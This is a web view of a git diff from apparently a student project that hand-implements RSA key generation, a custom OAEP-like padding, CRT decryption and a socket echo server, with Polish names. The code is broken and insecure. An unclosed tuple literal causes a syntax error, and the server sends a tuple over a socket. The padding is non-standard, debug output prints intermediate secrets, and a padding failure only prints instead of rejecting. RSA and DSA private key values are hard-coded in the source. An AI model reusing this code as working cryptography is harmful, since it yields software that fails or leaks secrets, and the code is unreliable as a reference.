wyn = get_random_bits(maksymalna_liczba_bitow_zapisu)
|
||||
# liczba miedzy 0 a dlugosc_przedzialu
|
||||
while wyn >= dlugosc_przedzialu:
|
||||
wyn = get_random_bits(maksymalna_liczba_bitow_zapisu)
|
||||
# liczba miedzy poczatek_inkluzywny a koniec_ekskluzywny
|
||||
wyn = poczatek_inkluzywny + wyn
|
||||
return wyn
|
||||
|
||||
|
||||
def generate_prime_number(bit_length: int) -> int:
|
||||
# prime needs to be in range [2^(n-1), 2^n-1]
|
||||
low = pow(2, bit_length - 1)
|
||||
high = pow(2, bit_length) - 1
|
||||
|
||||
while True:
|
||||
|
||||
# Generate odd prime candidate in range
|
||||
candidate_prime = get_random_bits(bit_length)
|
||||
while candidate_prime not in range(low, high + 1) or not candidate_prime % 2:
|
||||
candidate_prime = get_random_bits(bit_length)
|
||||
|
||||
# with k rounds, miller rabin test gives false positive with probability (1/4)^k = 1/(2^2k)
|
||||
k = 64
|
||||
if miller_rabin_prime_test(candidate_prime, k):
|
||||
return candidate_prime
|
||||
|
||||
|
||||
def rozszerzony_algorytm_euklidesa(a0, b0):
|
||||
a, b = a0, b0
|
||||
x, y = 1, 0
|
||||
r, s = 0, 1
|
||||
while b != 0:
|
||||
c = a % b
|
||||
q = a // b
|
||||
a, b = b, c
|
||||
r_pom, s_pom = r, s
|
||||
r = x - q * r
|
||||
s = y - q * s
|
||||
x, y = r_pom, s_pom
|
||||
nwd = x * a0 + y * b0
|
||||
return a, x, y, nwd
|
||||
|
||||
|
||||
def NWD(a, b):
|
||||
nwd1, _, _, nwd2 = rozszerzony_algorytm_euklidesa(a, b)
|
||||
if nwd1 == nwd2:
|
||||
return nwd1
|
||||
else:
|
||||
return None
|
||||
|
||||
|
||||
def odwrotnosc_modulo(a, n):
|
||||
_, x, y, _ = rozszerzony_algorytm_euklidesa(a, n)
|
||||
if a != 1 and x == 1:
|
||||
odwrotnosc_a = "nie ma elementu odwrotnego"
|
||||
elif x > 0:
|
||||
odwrotnosc_a = x % n
|
||||
else:
|
||||
odwrotnosc_a = (n + x) % n
|
||||
return odwrotnosc_a
|
||||
|
||||
|
||||
def szybkie_potegowanie_modulo(podstawa, wykladnik, rzad):
|
||||
pom = 1
|
||||
while wykladnik > 1:
|
||||
ostatni_bit = wykladnik & 1
|
||||
wykladnik >>= 1
|
||||
if ostatni_bit == 1:
|
||||
pom = (pom * podstawa) % rzad
|
||||
podstawa = (podstawa * podstawa) % rzad
|
||||
return (podstawa * pom) % rzad
|
||||
|
||||
|
||||
def genRSA(n=2048):
|
||||
p = generate_prime_number(n)
|
||||
# print(p.bit_length())
|
||||
q = p
|
||||
while q == p:
|
||||
q = generate_prime_number(n)
|
||||
# print(q.bit_length())
|
||||
N = p * q
|
||||
fi_N = (p - 1) * (q - 1)
|
||||
print(N.bit_length(), fi_N.bit_length())
|
||||
e = bezpieczny_randint(2, fi_N)
|
||||
while NWD(e, fi_N) != 1:
|
||||
e = bezpieczny_randint(2, fi_N)
|
||||
d = odwrotnosc_modulo(e, fi_N)
|
||||
# print(e.bit_length(),d.bit_length())
|
||||
klucz_publiczny = (N, e)
|
||||
klucz_prywatny = d
|
||||
return klucz_publiczny, klucz_prywatny, p, q
|
||||
|
||||
|
||||
def szyfrowanie_RSA_OAEP(N, e, m: bytes):
|
||||
byteorder = sys.byteorder
|
||||
# 256 + 128 = 384
|
||||
k = 256
|
||||
l = 128
|
||||
# G = sha384()
|
||||
# H = sha256()
|
||||
print("m", len(m) * 8)
|
||||
print("m", m)
|
||||
if len(m) * 8 != l:
|
||||
return "wiadomosc usi byc dlugosci l =" + str(l)
|
||||
m_prim = m.ljust(len(m) + k // 8, b"\0")
|
||||
int_m_prim = int.from_bytes(m_prim, byteorder)
|
||||
print("m'", len(m_prim) * 8)
|
||||
print("m'", m_prim)
|
||||
int_r = get_random_bits(k)
|
||||
r = int_r.to_bytes(k // 8, byteorder)
|
||||
print("r", len(r) * 8)
|
||||
print("r", r)
|
||||
int_G_od_r = int.from_bytes(sha384(r).digest(), byteorder)
|
||||
int_t = int_m_prim ^ int_G_od_r
|
||||
t = int_t.to_bytes((l + k) // 8, byteorder)
|
||||
print("t", len(t) * 8)
|
||||
print("t", t)
|
||||
int_H_od_t = int.from_bytes(sha256(t).digest(), byteorder)
|
||||
int_s = int_r ^ int_H_od_t
|
||||
s = int_s.to_bytes(k // 8, byteorder)
|
||||
print("s", len(s) * 8)
|
||||
print("s", s)
|
||||
m_prim_prim = s + t
|
||||
print("m''", len(m_prim_prim) * 8)
|
||||
print("m''", m_prim_prim)
|
||||
int_m_prim_prim = int.from_bytes(m_prim_prim, byteorder)
|
||||
c = szybkie_potegowanie_modulo(int_m_prim_prim, e, N)
|
||||
return c
|
||||
|
||||
|
||||
def deszyfrowanie_RSA_OAEP(N, d, c):
|
||||
byteorder = sys.byteorder
|
||||
# 256 + 128 = 384
|
||||
k = 256
|
||||
l = 128
|
||||
# G = sha384()
|
||||
# H = sha256()
|
||||
int_m_prim_prim = szybkie_potegowanie_modulo(c, d, N)
|
||||
m_prim_prim = int_m_prim_prim.to_bytes((l + 2 * k) // 8, byteorder)
|
||||
print("m''", len(m_prim_prim) * 8)
|
||||
print("m''", m_prim_prim)
|
||||
t = m_prim_prim[-((l + k) // 8):]
|
||||
print("t", len(t) * 8)
|
||||
print("t", t)
|
||||
s = m_prim_prim[:(k // 8)]
|
||||
print("s", len(s) * 8)
|
||||
print("s", s)
|
||||
int_H_od_t = int.from_bytes(sha256(t).digest(), byteorder)
|
||||
int_s = int.from_bytes(s, byteorder)
|
||||
int_r = int_H_od_t ^ int_s
|
||||
r = int_r.to_bytes(k // 8, byteorder)
|
||||
print("r", len(r) * 8)
|
||||
print("r", r)
|
||||
int_G_od_r = int.from_bytes(sha384(r).digest(), byteorder)
|
||||
int_t = int.from_bytes(t, byteorder)
|
||||
int_m_prim = int_G_od_r ^ int_t
|
||||
m_prim = int_m_prim.to_bytes((l + k) // 8, byteorder)
|
||||
print("m'", len(m_prim) * 8)
|
||||
print("m'", m_prim)
|
||||
koncowki = m_prim[-(k // 8):]
|
||||
m = m_prim[:l // 8]
|
||||
if koncowki != b"\0".ljust(k // 8, b"\0"):
|
||||
print("kon")
|
||||
print(koncowki)
|
||||
print(b"\0".ljust(k // 8, b"\0"))
|
||||
print("cowki")
|
||||
return m
|
||||
|
||||
|
||||
def efektywne_deszyfrowanie_RSA(N, d, c, p, q):
|
||||
u = odwrotnosc_modulo(p, q)
|
||||
c_p = c % p
|
||||
c_q = c % q
|
||||
d_p = d % (p - 1)
|
||||
d_q = d % (q - 1)
|
||||
m_p = szybkie_potegowanie_modulo(c_p, d_p, p)
|
||||
m_q = szybkie_potegowanie_modulo(c_q, d_q, q)
|
||||
m = (m_p + p * (m_q - m_p) * u) % N
|
||||
return m
|
||||
|
||||
|
||||
def deszyfrowanie_RSA_OAEP_efektywne(N, d, c, p, q):
|
||||
byteorder = sys.byteorder
|
||||
# 256 + 128 = 384
|
||||
k = 256
|
||||
l = 128
|
||||
# G = sha384()
|
||||
# H = sha256()
|
||||
int_m_prim_prim = efektywne_deszyfrowanie_RSA(N, d, c, p, q)
|
||||
m_prim_prim = int_m_prim_prim.to_bytes((l + 2 * k) // 8, byteorder)
|
||||
print("m''", len(m_prim_prim) * 8)
|
||||
print("m''", m_prim_prim)
|
||||
t = m_prim_prim[-((l + k) // 8):]
|
||||
print("t", len(t) * 8)
|
||||
print("t", t)
|
||||
s = m_prim_prim[:(k // 8)]
|
||||
print("s", len(s) * 8)
|
||||
print("s", s)
|
||||
int_H_od_t = int.from_bytes(sha256(t).digest(), byteorder)
|
||||
int_s = int.from_bytes(s, byteorder)
|
||||
int_r = int_H_od_t ^ int_s
|
||||
r = int_r.to_bytes(k // 8, byteorder)
|
||||
print("r", len(r) * 8)
|
||||
print("r", r)
|
||||
int_G_od_r = int.from_bytes(sha384(r).digest(), byteorder)
|
||||
int_t = int.from_bytes(t, byteorder)
|
||||
int_m_prim = int_G_od_r ^ int_t
|
||||
m_prim = int_m_prim.to_bytes((l + k) // 8, byteorder)
|
||||
print("m'", len(m_prim) * 8)
|
||||
print("m'", m_prim)
|
||||
koncowki = m_prim[-(k // 8):]
|
||||
m = m_prim[:l // 8]
|
||||
if koncowki != b"\0".ljust(k // 8, b"\0"):
|
||||
print("kon")
|
||||
print(koncowki)
|
||||
print(b"\0".ljust(k // 8, b"\0"))
|
||||
print("cowki")
|
||||
return m
|
||||
|
||||
|
||||
klucz_publiczny_RSA, klucz_prywatny_RSA, p, q = (
|
||||
519761468615543605427347715703470532429938244355530617462517836775139947735532430649086044712389065327373881495341570956912263636228899450218205333731994709572385570226639327413165593530360209805759468603639857045256463923468775944877723831073218948735316969800684547536389344549931456857234306842372788643144370170015431494005792115059852604376019742040737720145831855341361995847454762357088678899180062704532000519408988445258760142165454104557986566507437171014234130588907895586535673103026294670410052684946543540355295153040713047596704353948168657913426604838668582082688505569615845354438639297748571125719945947883870935481915168118357450909437162890949276124288629273158626408730136153353280259385734094248099908877393332627830019602495378740189414275791739220123642063963148205857703085745460786497856110396863143452962185817050131451659771071779171468538379804253272573761890205034195675788656368202533040838395434243520115268109258521563259069746861504072033382067677548531381312853098367831348608517017347561078932501869038526817662345324458956129880592307734774686126383765519554521082281355928596367373896420049772278195723106268205519834478036673827492711851824231074849054234160240213942064673753130040021561496201,
|
||||
477381706395942701152074095578632486629565400458439476605265085853794121036702612260159616584121387309492215289565364823820329641787576027356541944084504070937525199582998228494161581256587963350479182569767709073476305942938578516914185238354982945951325610464183760057011556336116027667431478443971789852497566022190931964624926914512000465438808202901732238917670859079331357158287446481486109341772535642821404724625886765680916122532309926171425411343129633761470730490722435328973775404176016783739955436887938755254368532747248553601029668098763389748002919821495769996090735951060509426001668094204167013619340151559257016228800996225376949328480285921295583758343588892868414107256524587102802726669931221977934082695445776450539968355018778177567062955955188598370628274906129902341525667948146220455560650547385726862123568732001996709039776914328180353694837345124024464856436018138531057521237527151154874694659679915931307604482959674167927057989516514567590062270287113788435548631219164690228588947375243868674913030414096170014455884449983476702938473784682164922729359739421419438500787506002570332539986745630166359816334300274692876831789517660550946290972807224515579551609831535687760126827024718122063108706599), 351666562595755180375395684706241055066156015118305238714672681051882280187504041643434000791814441548607213636968471872699749514579264747751265631272256072725451071040601318567317130676266378472799425651993837557182657388293299120738132040687844779805705782033358582690112156036725659897429182523487027733035393136127607866012534194708593248355973043622949956480835065663676049584885243751590721741501965828757835520710448143589654198570646114663285241248290713467857410885600973553990582698560020712556891679552160547216847450959753723375562391525266281121596206287835239825464988412752920851291059488855778730214384761750487421888963628985845627716345194071713463878260961723623247223927256636464995367615914339908375807571549256908577125462826282135037163236879694999772105827399413764752262353954388137128091790174996148478228118409615917295349567618090677194660136786354642358341440475271809799562062575133857219513963659279640385931136925337147793582596685284559585465388622433797482322409875254412068070757284707921223037714540415540426945620781055610759002438036137835981012468827444588505213686787128969359012972104378460526475214473144375243797989638951510244270960646393807997876101642432170306423462852210882508497178399, 25135373776665590901202336545666836840803391456241601649197796217462555674052551470602221560430959564950903058760936416369952872220340695429584839910539112417172641186658957618681049568598438406515601629945861509808185343104246257658988353826830801833070838727357392230011787930325906736489581750024881433299826206439672753310114100220662748513681137812457302883579006216830084552049499018274245345348857361546260882853255668574117727827869922237413735566854945952091470823515266658679062817428979342500513620275531312300114575338687577827028450767856524439798014817991240510086446185465180093752648368250982692996851, 20678485756120477969749679171411892295363660397911095536909078058504743163718110463975943096121495385121226766215138672406087647843042984392942673880078680348165649479590165596137059916732118274875699928110613763860604584697412776630385407698849636163585027765534352995283408392656841447656433417025991247442767235071030016493820494123404672276837056547392384047230316759182798179296559194938230590081605300708541927122089496849298160531622588496007433560523950635471318918140715059942293286734964890852647775755004955456829006947025556582805868127595216838587483482482814544235364358121943295803510671636196385576851
|
||||
klucz_publiczny_RSA,klucz_prywatny_RSA, p, q = genRSA()
|
||||
print(klucz_publiczny_RSA, klucz_prywatny_RSA, p, q)
|
||||
N, e = klucz_publiczny_RSA
|
||||
d = klucz_prywatny_RSA
|
||||
m = "Thats my Kung Fu".encode("ASCII")
|
||||
c = szyfrowanie_RSA_OAEP(N, e, m)
|
||||
print("szyfrgr", c)
|
||||
m = deszyfrowanie_RSA_OAEP(N, d, c)
|
||||
print(m)
|
||||
m = deszyfrowanie_RSA_OAEP_efektywne(N, d, c, p, q)
|
||||
print(m)
|
||||
|
28
serwer.py
Normal file
28
serwer.py
Normal file
@ -0,0 +1,28 @@
|
||||
# https://realpython.com/python-sockets/
|
||||
# echo-server.py
|
||||
import socket
|
||||
|
||||
PORT = 65432 # Port to listen on (non-privileged ports are > 1023)
|
||||
ip_info = socket.getaddrinfo(socket.gethostname(), PORT)
|
||||
# print(ip_info)
|
||||
HOST = ip_info[-1][-1][0]
|
||||
|
||||
print(HOST, ":", PORT)
|
||||
|
||||
klucz_publiczny_DSA, klucz_prywatny_DSA = (126220152782999491712146716573647923575210663342203877875997463151103734117618780085961998496900968641688295271738389523168262437046367952410100230715977561698699865420228930481833546803155826687224437601550687821059803843460614018330735329864730711512369415813709177511423225057391814747172616206699791431113, 1026153776632400528836961826077414494924816203371, 33135294496110223909298149780807071663246150710874084366253067988796622596843824622279842916377597978486097816392781318387311279773566894876369811406237208448656803682244786284714051489351162528336310611509464319257937304463246532853715133677606472539203807274116025362212599140301963520366587373345549232664, 57789326082328055343244183952945963065038001008054371988423611501774965584951836084636408462704147650194354237953178434916234787575914934345509256412623906774868805317306029570637051066904576874737549979887847806955662502738986630454336931791238784800404714101190106940899556139200869987149012959023189160975) 601201094732353224640534306619895007746271908982
|
||||
p, q, g, y = klucz_publiczny_DSA
|
||||
x = klucz_prywatny_DSA
|
||||
|
||||
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||
s.bind((HOST, PORT))
|
||||
s.listen()
|
||||
conn, addr = s.accept()
|
||||
conn.send(b"klucz publiczny")
|
||||
conn.sendall(klucz_publiczny_DSA)
|
||||
with conn:
|
||||
print(f"Connected by {addr}")
|
||||
while True:
|
||||
data = conn.recv(1024)
|
||||
if not data:
|
||||
break
|
||||
conn.sendall(data)
|
Loading…
Reference in New Issue
Block a user